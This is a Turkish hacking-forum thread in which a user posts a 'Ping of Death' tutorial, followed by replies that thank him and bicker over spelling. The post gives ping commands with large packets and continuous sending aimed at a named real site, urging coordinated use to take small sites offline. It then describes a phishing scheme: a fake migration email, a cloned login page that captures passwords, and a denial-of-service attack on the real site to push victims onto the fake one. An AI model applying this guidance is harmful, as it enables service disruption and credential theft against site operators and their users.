[Beyaz Tahribat] Ping Of Death Yontemi

1. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Ayro
    Ayro's avatar
    Erkek
    -Beyaz Tahribat kampanyası tahribatı bilgilerle güzelleştirelim televole konularıyla pisletmeyelim-

Not:Oturup kendim yazdım çalıpta zumsuk yazmıştır demeyenin...
    Not2: yenilere hea..

Arkadaşlar şimdi başlar/çalıştır a gelip cmd yazın ve açılan programa şunu yazın ping mynet.com .NE gördünüz?

ping antichat.ru

32 bayt veri ile antichat.ru [89.108.87.235] "ping" ediliyor:

89.108.87.235 cevabı: bayt=32 süre=228ms TTL=106
    89.108.87.235 cevabı: bayt=32 süre=232ms TTL=106
    89.108.87.235 cevabı: bayt=32 süre=226ms TTL=106
    89.108.87.235 cevabı: bayt=32 süre=231ms TTL=106

89.108.87.235 için Ping istatistiği:
    Paket: Giden = 4, Gelen = 4, Kaybolan = 0 (0% kayıp),
    Mili saniye türünden yaklaşık tur süreleri:
    En Az = 226ms, En Çok = 232ms, Ortalama = 229ms

Peki bakın ne diyor bayt:32 32 baylık veri gönder mişiz.Şimdi biz daha büyük paket yollarsak bu makina bir süre sonra paketlere yanıt veremeyecektir.

Şunu yazın

ping antichat.ru -l 500 -t

Burda -l (limonun l si oluyor) paket boyutunu söylüyor.-t ise sürekli göndermenizi sağlıyor ben -t olmadan deneme yapıyorum.

ping antichat.ru -l 500

500 bayt veri ile antichat.ru [89.108.87.235] "ping" ediliyor:

89.108.87.235 cevabı: bayt=500 süre=303ms TTL=106
    89.108.87.235 cevabı: bayt=500 süre=304ms TTL=106
    89.108.87.235 cevabı: bayt=500 süre=305ms TTL=106
    89.108.87.235 cevabı: bayt=500 süre=300ms TTL=106

89.108.87.235 için Ping istatistiği:
    Paket: Giden = 4, Gelen = 4, Kaybolan = 0 (0% kayıp),
    Mili saniye türünden yaklaşık tur süreleri:
    En Az = 300ms, En Çok = 305ms, Ortalama = 303ms

Yani nedir bu ? Paket boyutunu büyütüp, bir kaç kişi ile girdiğinizde site inecektir ufgak çaplı(bantları küçük olan) sitelere deneyin.

Sonucunda ne elde edersiniz?

Bende bir çok kişi gibi önceden lamerce yontem diyordum ancak şimdi kullanılan açıya göre değişir diyorum.Çünkü şunu düşünün çok büyük bir firma.Bu firmadan birisinin şifresini çalacaksınız.O zaman şunu yapabilirsiniz.Firmayı atıyorum www.antitrojan.com olsun.Şimdi önce bir ön araştırma yaptınız.Daha sonra kullanıcılardan bi kaçına ulaştınız.Mail adresleri elinizde.Hemen hemen her gün giren kullanıcılar olsa daha iyi.Neyse şimdi mail attınız dediniz ki;

"Yeni sisteme geçiyoruz.Lütfen bir kaç gün içinde giriş yapınız ve bilgilerinizi yenileyiniz.

www.antitrojan.com Eğer bu adres açılmıyorsa http://ipadresi/login.php"

Burda ip adresi dediğim sitenizin ip adresi olacaktır.Aynen antitrojan gibi yapın siteyi kodlarını alıp halledersiniz Gülümseme login sayfasına sahte bir giriş yapın.Şifre elinize ulaşsın fake yane.Daha sonra sayfa Sistem çok yoğun lütfen daha sonra tekrar deneyin yazısına gitsin.Sonra şifreleriniz gelene kadar dosu kesmeyin.

Evet burda milletin lamerce dediği ve kullanmadı iki saldırıyı kullandık.birisi fake sayfa birisi dos.Gördüğünüz gibi aslında çok bildiğini sandığınız insnalar bu kadar mantıksız.Herkez kendileri gibi düşünüyor ve lamerce deyip geçiyor.Onların sisteme girmeleri aylarını alırken basit yontemle sadece 2-3 gün dos çekip antitrojan.com u kapadık ve şifrelerimizin gelişine baktık.Daha sonra dosu kestik.Site açılınca şifreleri girdik.Eğer bu şirket pclerine uyarlanırsa şirketin sistemine dahi sızıla bilir.

Hackte aklınızı kullanın en büyük silah akıl en büyük araç bilgisayar en büyük teknik bilgidir.Kimseye bakmayın.Milletin lamerce dediği yontemleri dahi aklınızı kullanarak en yüksek verimde kullanmaya çalışın.
  2. KısayolKısayol reportŞikayet pmÖzel Mesaj
    RockZs
    RockZs's avatar
    Erkek
    Sağolasın.
    Böyle yazıların artması dileğiyle.
  3. KısayolKısayol reportŞikayet pmÖzel Mesaj
    aZaPp
    aZaPp's avatar
    Erkek
    eet arTsa iyi oLur qeyikTen ßa$ka SheyLerde payLaSaLım.zumsuqe Tesekkur edioruz .SaoL maoL.

Hayat bir oyun olmuş sokaklar sahne,herşey sahte...
  4. KısayolKısayol reportŞikayet pmÖzel Mesaj
    C_e_Z_a
    C_e_Z_a's avatar
    Erkek
    Azap :

eet arTsa iyi oLur qeyikTen ßa$ka SheyLerde payLaSaLım.zumsuqe Tesekkur edioruz .SaoL maoL.

---------------------------------

Kardeşim bana kalırsa ilk önce Türkçe'ni düzelt...Deli oluyorum tikky tarzında yazılan cümleleri gördükçe..Belki tikky değilsin ama yinede dikkat et,öyle bir imaj uyandırıyosun,en azından ben öyle görüyorum!!

Zumsuk 'e teşekkürler bu arada...!

Makaleyaz.Net - Türkiye'nin Makale Alım-Satım Platformu
  5. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Ayro
    Ayro's avatar
    Erkek
    oh bea bende tam yeni mesaj attım dedim konularımı okuyan çıkmadı sizin gib adamlar olursun ne var ne yok paylaşırım isteyen öğrenir saolun arkadaşlar.

http://www.tahribat.com/forumdisplayfolder.asp?folderid=34423

bende fırçayı çekmiştim burda

-beyaz tahribat kampanyası-
  6. KısayolKısayol reportŞikayet pmÖzel Mesaj
    aZaPp
    aZaPp's avatar
    Erkek
    ceza ßiLader sanane ßen onu coZemedim.hani tkky faLan da deqiLiz qayeT SefiL 1 haLdeim artı ßu ßenim tarzım Sana Laf soyLemek Du$mez neT uzerinden kimin ne oLDuqu ßeLLimi de qeLmi$ Laf yapıoSun ayrıca tkkyLere ßenim kadar kıL oLduqunuda ZanneTmiorum.

7. KısayolKısayol reportŞikayet pmÖzel Mesaj
    nurk
    nurk's avatar
    Üstün Hizmet Madalyası
    Erkek
    eyw zumsuk la :D :PP

[22817//kaanabak]
  8. KısayolKısayol reportŞikayet pmÖzel Mesaj
    C_e_Z_a
    C_e_Z_a's avatar
    Erkek
    Azaap:

ceza ßiLader sanane ßen onu coZemedim.hani tkky faLan da deqiLiz qayeT SefiL 1 haLdeim artı ßu ßenim tarzım Sana Laf soyLemek Du$mez neT uzerinden kimin ne oLDuqu ßeLLimi de qeLmi$ Laf yapıoSun ayrıca tkkyLere ßenim kadar kıL oLduqunuda ZanneTmiorum.

-----------------------------

Banane diyeceğim bir olay yok çünkü Türkçe'ye zarar veriyorsun...
    Belki şahsi bir sorunum yok (ki yok..),ama babamda olsa düzgün yazmadığı bi cümle yada kelime olursa terslerim kardeşim..İyice sıçtılar çünkü Türkçe'nin içine...

Neyse konu saptı,ben sana bi yanlış yaptıysam özür dilerim..

Ama sen Türkçeye yanlış yapıyorsun, bence tüm müridlerden özür dile!!

Makaleyaz.Net - Türkiye'nin Makale Alım-Satım Platformu
  9. KısayolKısayol reportŞikayet pmÖzel Mesaj
    aZaPp
    aZaPp's avatar
    Erkek
    Ozaman yeni 1 ßa$Lık aC herkeZ herkeZde öZür diLeSin ßak etraFına önce Sonra qeL konu$.önce tkky sonra Türkce Sırada ne var küreseL ısınmamı ?

10. KısayolKısayol reportŞikayet pmÖzel Mesaj
    miRkuT
    miRkuT's avatar
    Erkek
    okumak güzeldir güzel.. döküman için teşekkür.

Bildiği kadarıyla adalet eden, bilmediği kadarıyla zulmeder...!
  11. KısayolKısayol reportŞikayet pmÖzel Mesaj
    xursi
    xursi's avatar
    Erkek
    aslında hocam burada 3 şeye değindin evet fake,dos, sosyal mühendisliği kullanmayıda öğretiyon:D bir taşta kuş katliamı yani süper. teşekürler daha diğer dökümanları okuyacam :D
Toplam Hit: 9747 Toplam Mesaj: 36